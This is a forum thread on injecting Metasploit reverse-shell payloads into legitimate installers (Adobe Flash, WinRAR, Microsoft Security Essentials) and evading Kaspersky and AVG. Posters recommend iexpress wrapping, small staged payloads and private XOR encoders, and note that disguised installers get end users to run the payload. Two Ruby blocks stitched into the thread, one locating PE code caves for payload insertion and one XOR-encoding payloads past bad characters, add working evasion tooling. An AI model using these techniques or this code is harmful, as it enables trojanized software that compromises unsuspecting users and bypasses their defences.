Thread: Metasploit encoding

  1. #1
    Junior Member
    Join Date
    Jun 2010
    Posts
    35

    Metasploit encoding

    Hello,

    Metasploit is a great tool, but I have never yet been able to perform a successful exploit because of my internet security program (Kaspersky). There are tons of tutorials to be found on the net about Metasploit, but none of them works without disabling Kaspersky.

    What I want to try is to download a working exe from the internet, for example Skype, inject this exe with the payload, and encode it so it goes undetected.
    I tried to do this by altering the .text and .data parts with a PE editor. I added 500 bytes and made .text executable and .data writable. Then I added 500 null bytes with a hex editor and tried to encode it. It says 'no encoders succeeded'.

    I think I'm a bit on the wrong track here, but I can't seem to find well-written explanations about this. It is always assumed that you have an encodable .exe. But what if you have not?

    I'm not really asking for a complete tutorial, just point me in the right direction and I'll be happy..

    (you can go hard on me if I'm completely wrong in my thinking)

    thanks
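    The edits the post above describes (growing .text and .data and flipping their section flags in a PE editor) can be checked programmatically instead of by eye. The following Ruby is an added example written for this edit, not the poster's tool and not Metasploit's code: it builds a constructed, header-only PE32 image in memory (two sections, fabricated sizes, zero-filled bodies, no real code), parses the section table, and reports for each section its memory flags and the slack between VirtualSize and SizeOfRawData, which is the file-alignment padding a payload of a given size would have to fit into. The header offsets and IMAGE_SCN_* constants are the documented PE values; the sample image and its sizes are constructed.

```ruby
# Added example (editor's code, not from the thread or Metasploit): parse a
# PE section table and report which sections are executable/writable and how
# much file-alignment slack (a potential code cave) each one carries.

IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

# Build a constructed PE32 image: valid headers, two sections, zero-filled
# section bodies. Not a runnable executable, just enough for the parser.
def build_sample_pe
  dos  = "MZ".b + ("\0" * 58).b + [0x40].pack('V')           # e_lfanew at 0x3C points to 0x40
  sig  = "PE\0\0".b
  coff = [0x014c, 2, 0, 0, 0, 224, 0x0102].pack('vvVVVvv')  # i386, 2 sections, 224-byte optional header
  opt  = [0x10b].pack('v') + ("\0" * 222).b                  # PE32 magic, remaining fields left zero
  text = ['.text', 0x0E00, 0x1000, 0x1000, 0x0400, 0, 0, 0, 0,
          IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ].pack('a8VVVVVVvvV')
  data = ['.data', 0x0400, 0x2000, 0x0400, 0x1400, 0, 0, 0, 0,
          IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE].pack('a8VVVVVVvvV')
  (dos + sig + coff + opt + text + data).ljust(0x1800, "\0".b)
end

# Walk DOS header -> PE signature -> COFF header -> section table.
def parse_sections(pe)
  raise 'missing MZ signature' unless pe[0, 2] == 'MZ'
  e_lfanew = pe[0x3C, 4].unpack1('V')
  raise 'missing PE signature' unless pe[e_lfanew, 4] == "PE\0\0"
  coff      = e_lfanew + 4
  nsections = pe[coff + 2, 2].unpack1('v')   # NumberOfSections
  opt_size  = pe[coff + 16, 2].unpack1('v')  # SizeOfOptionalHeader
  table     = coff + 20 + opt_size           # section headers follow the optional header
  Array.new(nsections) do |i|
    name, vsize, vaddr, rawsize, rawptr, _relocs, _lines, _nrelocs, _nlines, chars =
      pe[table + 40 * i, 40].unpack('a8VVVVVVvvV')
    slack = rawsize > vsize ? rawsize - vsize : 0
    {
      name: name.delete("\0"), virtual_address: vaddr, virtual_size: vsize,
      raw_size: rawsize, raw_ptr: rawptr,
      executable: (chars & IMAGE_SCN_MEM_EXECUTE) != 0,
      writable:   (chars & IMAGE_SCN_MEM_WRITE) != 0,
      slack: slack,
      # Slack only counts as a usable cave if those file bytes are really unused (all zero).
      cave_clear: slack > 0 && pe[rawptr + vsize, slack].bytes.all?(&:zero?)
    }
  end
end

# Sections whose trailing slack could hold `needed` bytes without growing the file.
def find_caves(pe, needed)
  parse_sections(pe).select { |s| s[:cave_clear] && s[:slack] >= needed }
end

if __FILE__ == $PROGRAM_NAME
  pe = build_sample_pe
  parse_sections(pe).each do |s|
    printf("%-8s va=%#08x vsize=%#06x raw=%#06x exec=%-5s write=%-5s slack=%d\n",
           s[:name], s[:virtual_address], s[:virtual_size], s[:raw_size],
           s[:executable], s[:writable], s[:slack])
  end
  puts "sections with a 500-byte cave: #{find_caves(pe, 500).map { |s| s[:name] }.inspect}"
end
```

    In the constructed image .text has 0x200 bytes of slack and is already executable, so a 500-byte blob fits without adding bytes or touching flags; .data has none, which is the case where a PE editor has to grow the section and where the added bytes then stand out. Run the same parser over a real binary (File.binread) before deciding which section to touch.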

  2. #2
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Re: Metasploit encoding

    Have you tried encoding the payload you want, outputting it to an exe and then wrapping them both together using iexpress in Windows?

    I've had some success with this before but have never tested it against Kaspersky. I use a small program, convert.exe, that does basic conversions for you; I used that with my encoded payload (as an exe) and used iexpress to package the two executables together. Then when I run my 'new' convert.exe (which has the hidden payload) I can get a shell.

    Not sure if this is where you're heading but it works well for me.

    Sickness did a sweet tutorial on this using the MSN installer to hide the payload; search Google for "backtrack iexpress" and you should find the first hit is his tutorial.

    Hope that helps somewhat.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Re: Metasploit encoding

    Skype is not a good thing to practice with. Skype actually uses a form of packer to create their legit binary. It's a very odd method; however, it makes it exceedingly difficult to inject a payload into it. I would suggest working with the Adobe Flash installer or something along those lines.

  4. #4
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Re: Metasploit encoding

    I tested the Adobe Flash installer injected with a Meterpreter reverse TCP. It worked on my Windows XP Professional SP3 and didn't get detected by AVG AV, but it didn't work on Windows 7 Home Premium (it didn't get detected by AVG AV, but it just didn't work). I have had some success with injecting the Meterpreter reverse TCP payload into WinRAR or into the Microsoft Security Essentials installer. A quick Google search should give you the exes.

  5. #5
    Junior Member
    Join Date
    Jun 2010
    Posts
    35

    Re: Metasploit encoding

    Thank you all for the answers. I'm pretty sceptical about being able to circumvent Kaspersky, but I'll check out the methods that you guys suggested.

    One question though: if I try the Adobe Flash installer, do I also have to put the two exes together with iexpress, or will it just work?
    I'm a bit confused why for some exes the encoding just works, and for some I need to combine the payload exe with the real exe.
    On top of that, I thought that I read somewhere that I should adapt the .text and .data fields of the exe with a PE editor.

    Some suggested reading on this, or is it just different for every exe?

    Thanks

  6. #6
    Junior Member laptopz's Avatar
    Join Date
    Dec 2010
    Posts
    55

    Re: Metasploit encoding

    Using a small staged payload might give you better chances of evading... something like windows/shell/reverse_tcp
    If anything can go wrong, it will....

  7. #7
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Re: Metasploit encoding

    I think it depends on what payload you start with in the first place. As laptopz said, you have a better chance using windows/shell/reverse_tcp because I don't think it contains the 'signature' that most AVs look for, plus it's less code to scan. From there you could move to Meterpreter etc.

    Combining the payload with another exe like the Adobe Flash installer, as purehate says, is a good way of getting the end user to run your payload because it looks less suspicious than some random executable.

    Check out Metasploit Unleashed; there's some good info on binary payloads and AV bypass.

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Re: Metasploit encoding

    The only reason you should need to edit the .exe with a PE editor is if you are doing some custom AV stuff. If you are using Metasploit to encode an exe file, it is done for you. For example, in 2008 muts did a talk at ShmooCon called "I piss on your AV". In this talk he created a custom XOR loop which encoded the binary to avoid AV detection. This is essentially the same thing the Metasploit encoders do. For that type of thing you would want to use a PE editor.

    It is always really good to learn how to do these things manually to understand what's happening. I use the Metasploit encoders as well; however, I have done it manually many times. The other good part about knowing how to do it manually is that with a cursory amount of assembly knowledge you can create an encoder no one else has, and then you will truly be able to bypass AV. I have 2 I will never share and they beat all AVs all the time.
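    The post above describes the XOR-loop approach: the payload bytes are XORed with a key and a small stub restores them at run time, so the encoder's real job is picking a key such that neither the key nor any encoded byte is a character the delivery path forbids. The following Ruby is an added example written for this edit; it is not Metasploit's encoder code and not muts's, and it models only the key search and the encoding pass (no decoder stub is emitted). The nine-byte payload is a constructed stand-in, not a working stager, and \x00 is used as the only bad character. It also shows the condition under which an encoder of this kind has to give up with 'no encoders succeeded', the message quoted in the first post: with a single-byte key, a buffer that contains every byte value can never avoid a bad character, because the byte equal to key ^ bad_char always encodes to bad_char, and a two-byte key gets past that because each key byte only has to clear its own half of the buffer.

```ruby
# Added example (editor's code, not Metasploit's): a repeating-key XOR encoder
# with bad-character avoidance, modelling the key selection an XOR-loop
# encoder must do before a decoder stub can be prepended to the result.

# Constructed stand-in for a payload; not a working stager.
SAMPLE_PAYLOAD = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5".b
# A buffer holding every byte value once: the worst case for a short key.
ALL_BYTES      = (0..255).to_a.pack('C*')
# Constructed bad-character set: NUL, the usual culprit when a payload travels through a C string.
BAD_CHARS      = "\x00".b

# XOR buf with a repeating key (array of byte values). XOR is its own inverse,
# so the same call decodes, which is all the runtime decoder loop has to do.
def xor_encode(buf, key)
  buf.bytes.each_with_index.map { |b, i| b ^ key[i % key.length] }.pack('C*')
end
alias xor_decode xor_encode

# Search for a key_len-byte key such that neither the key bytes (they live in
# the decoder stub) nor any encoded byte is a bad character. Key byte j only
# ever touches payload positions i with i % key_len == j, so each key byte is
# chosen independently against its own slice of the payload.
def find_key(buf, bad_chars, key_len)
  bad   = bad_chars.bytes
  bytes = buf.bytes
  key   = []
  key_len.times do |j|
    slice = bytes.each_with_index.select { |_, i| i % key_len == j }.map(&:first)
    k = (1..255).find { |c| !bad.include?(c) && slice.none? { |b| bad.include?(b ^ c) } }
    return nil unless k
    key << k
  end
  key
end

# Try successively longer keys; fail with msfencode's wording when none works.
def encode_payload(buf, bad_chars, key_lengths = [1, 2, 4])
  key_lengths.each do |len|
    key = find_key(buf, bad_chars, len)
    return { key: key, encoded: xor_encode(buf, key) } if key
  end
  raise 'no encoders succeeded'
end

if __FILE__ == $PROGRAM_NAME
  res = encode_payload(SAMPLE_PAYLOAD, BAD_CHARS)
  printf("key %s -> %s\n", res[:key].inspect, res[:encoded].unpack1('H*'))
  puts 'round trip ok' if xor_decode(res[:encoded], res[:key]) == SAMPLE_PAYLOAD
  begin
    encode_payload(ALL_BYTES, BAD_CHARS, [1])
  rescue RuntimeError => e
    puts "single-byte key over all 256 byte values: #{e.message}"
  end
  puts "two-byte key over all 256 byte values: #{find_key(ALL_BYTES, BAD_CHARS, 2).inspect}"
end
```

    The encoded bytes are only half the job: a real encoder prepends a decoder stub that holds the key and loops over the buffer, and that stub is itself subject to the same bad-character rules, which is why the key bytes are screened here too.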
